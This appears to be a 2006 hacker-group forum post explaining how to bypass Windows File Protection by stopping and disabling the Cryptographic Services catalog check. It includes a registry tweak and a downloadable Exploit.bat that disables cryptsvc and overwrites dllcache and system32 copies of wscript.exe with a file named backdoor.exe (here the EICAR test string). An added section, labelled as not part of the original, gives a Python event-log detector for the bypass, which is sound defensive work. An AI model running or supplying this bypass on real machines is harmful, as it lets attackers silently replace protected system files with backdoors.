Author: allyesno
Team: freexploit
Date: 2006-01-20
I spent a lot of time last night writing an article on bypassing WFP protection, and it turned out to be wrong. I felt very uncomfortable about it, so I decided to challenge WFP again.
To catch the bandits, first catch the ringleader; to kill a snake, strike it seven inches below the head. If we grab WFP by its weak spot, it cannot stand up.
So what is WFP's weak spot?
Quote:
This protection is triggered after WFP receives a directory change notification for a file in a protected directory. After receiving this notification, WFP determines which file was changed. If the file is a protected file, WFP looks up the file signature in a catalog file to determine whether the new file is the correct version. If the file is not the correct version, WFP replaces the new file with the file from the cache folder (if it is in the cache folder) or from the installation source.
WFP's weak spot is the catalog file: cut off the catalog signature check and WFP is basically crippled.
How do we cut it off? Consult the Sunflower Manual (MSDN): to master the art, you must first castrate yourself. We know that Windows has a service called Cryptographic Services.
The description of this service is:
Quote:
Provides three management services: Catalog Database Service, which confirms the signatures of Windows files; Protected Root Service, which adds and removes Trusted Root Certification Authority certificates from this computer; and Key Service, which helps enroll this computer for certificates. If this service is stopped, these management services will not function properly. If this service is disabled, any services that explicitly depend on it will fail to start.
You can kill the service with net stop. Since the service starts again automatically after a reboot, use sc config to set its start type to disabled. Both steps need administrative rights, and as the description says, anything that depends on this service (the catalog signature check included) stops working along with it.
Important supplement:
XP SP2 and 2K tests by luoluo
[16:57] <luoluo> CS is cryptsvc.dll
[16:58] <luoluo> it runs in svchost mode on Win XP
[] <luoluo> on Win 2000 this module can be found in the services process
Important addition:
After repeated tests, we found that the CS service and several WFP features are automatically enabled again after the first shutdown.
(CS is not automatically enabled again after repeated starts and stops.)
So I think this is why envymask got a pop-up box while testing.
There are two solutions:
1. Use the service-replacement trick proposed by luoluo: replace the CS service with some other service, so the check cannot come back even if CS is started again.
2. Modify the registry key HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Hardware Profiles\0001\System\CurrentControlSet\Enum\Root\LEGACY_CRYPTSVC\0000 (the CSConfigFlags value of the hardware profile's entry for the service):
0 = enabled
1 = disabled
To get rid of the CS service completely, set the value to 1.
WFP only calls the CS service to check a system file at the moment that file is deleted or replaced.
Once CS has been killed, a system file that is deleted or replaced stays replaced; it is not changed back even if CS is started again afterwards.
So WFP monitoring is dynamic: it reacts to the change notification at the time of the change and does not rescan later.
Here is a bat file that implements this; the test passed on Win 2003.
Exploit.bat:
@echo off
rem cheat WFP check by allyesno
rem my site: http://blog.donews.com/allyesno/
rem my email: shellget@hotmail.com
echo plz waiting net stop to stop
net stop "Cryptographic Services"
echo.
echo plz waiting SC config this service
sc config cryptsvc start= disabled
rem write a dummy "backdoor" into dllcache: the EICAR test string, so any AV will flag it
rem (the percent and caret characters of the string are doubled so they survive batch parsing)
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*>%SystemRoot%\system32\dllcache\backdoor.exe
rem back up the cached copy, then overwrite both the cached copy and the live file
echo copy /Y %SystemRoot%\system32\dllcache\wscript.exe %SystemRoot%\system32\dllcache\wscript.exe.bak
copy /Y %SystemRoot%\system32\dllcache\wscript.exe %SystemRoot%\system32\dllcache\wscript.exe.bak
echo copy /Y %SystemRoot%\system32\dllcache\backdoor.exe %SystemRoot%\system32\dllcache\wscript.exe
copy /Y %SystemRoot%\system32\dllcache\backdoor.exe %SystemRoot%\system32\dllcache\wscript.exe
echo copy /Y %SystemRoot%\system32\dllcache\backdoor.exe %SystemRoot%\system32\wscript.exe
copy /Y %SystemRoot%\system32\dllcache\backdoor.exe %SystemRoot%\system32\wscript.exe
echo yeah we finished our work
echo check the %SystemRoot%\system32\wscript.exe by dir
echo n u C the file size, good luck test by allyesno in win2003 n WINXP OS
echo THX: Heze, envymask, 10, luoluo 4 Test
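The defender's side of the trick above, as an added example that is not part of the original post or its attachment: the bat file leaves two Service Control Manager records in the System log, event 7036 ("... service entered the stopped state") for the net stop and event 7040 ("The start type of ... was changed from ... to disabled") for the sc config. The script below parses such records and raises an alert per stop of Cryptographic Services, rated higher when the service was also set to disabled within a short window. The records are constructed for the example, and the "timestamp|source|event_id|message" layout is this script's own assumption, not a Windows export format.

```python
"""Correlate cryptsvc stop/disable events that blind WFP (added example)."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample records (not a real log); field layout is this script's own.
SAMPLE_LOG = """\
2006-01-20 16:55:01|Service Control Manager|7036|The Cryptographic Services service entered the running state.
2006-01-20 16:57:10|Service Control Manager|7036|The Cryptographic Services service entered the stopped state.
2006-01-20 16:57:12|Service Control Manager|7040|The start type of the Cryptographic Services service was changed from auto start to disabled.
2006-01-20 17:30:00|Service Control Manager|7036|The Print Spooler service entered the stopped state.
2006-01-21 09:00:00|Service Control Manager|7036|The Cryptographic Services service entered the running state.
"""

SCM = "Service Control Manager"
# Services whose shutdown weakens a protection mechanism; cryptsvc backs WFP.
WATCHED = {"Cryptographic Services"}

STOPPED_RE = re.compile(r"^The (?P<svc>.+?) service entered the stopped state\.$")
DISABLED_RE = re.compile(
    r"^The start type of the (?P<svc>.+?) service was changed from .+? to disabled\.$"
)


@dataclass
class Event:
    when: datetime
    source: str
    event_id: int
    message: str


def parse_log(text: str) -> List[Event]:
    """Parse the pipe-separated records used by this example."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        when, source, event_id, message = line.split("|", 3)
        events.append(Event(datetime.strptime(when, "%Y-%m-%d %H:%M:%S"),
                            source, int(event_id), message))
    return events


def find_wfp_bypass(events: List[Event],
                    window: timedelta = timedelta(minutes=10)) -> List[Dict]:
    """Return one alert per stop of a watched service.

    Severity is "high" when the same service is also set to disabled within
    the window (it will not come back after a reboot, so WFP stays blind),
    otherwise "medium" (a plain stop is undone by the next boot).
    """
    events = sorted(events, key=lambda e: e.when)
    alerts = []
    for ev in events:
        if ev.source != SCM or ev.event_id != 7036:
            continue
        m = STOPPED_RE.match(ev.message)
        if not m or m.group("svc") not in WATCHED:
            continue
        svc = m.group("svc")
        disabled_at = None
        # Look on both sides of the stop: "sc config" may run before "net stop".
        for other in events:
            if other.source != SCM or other.event_id != 7040:
                continue
            if abs(other.when - ev.when) > window:
                continue
            d = DISABLED_RE.match(other.message)
            if d and d.group("svc") == svc:
                disabled_at = other.when
                break
        alerts.append({
            "service": svc,
            "stopped_at": ev.when,
            "disabled_at": disabled_at,
            "severity": "high" if disabled_at else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in find_wfp_bypass(parse_log(SAMPLE_LOG)):
        print(alert)
```

On a real machine the records come from the System log rather than from a string, and the author's own observation above (CS comes back on its own after the first shutdown) means a later 7040 changing the start type from disabled back to auto start is also worth watching; this example only correlates the stop with the disable.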
My site: http://blog.donews.com/allyesno/
My email: shellget@hotmail.com (only text-only mail is accepted)
Many thanks to zex and envymask for the test results on Win 2003, and to 10 for the test on 2K.
Supplement: the service-replacement approach proposed by luoluo, and testing on XP SP2
References:
http://www.microsoft.com/china/winlogo/policies/signature-benefits.asp
http://support.microsoft.com/default.aspx?scid=kb;zh-cn;222193
http://support.microsoft.com/default.aspx?scid=kb;zh-tw;282784
Attachment: exploit.rar
Phantom Group / Phantom Water: 14335770; PST project: 16385798; IRC chat rooms: irc.0x557.org +9940 (SSL) #ph4nt0m #segfault; xfocus.org +61111 (SSL) #sigxfocus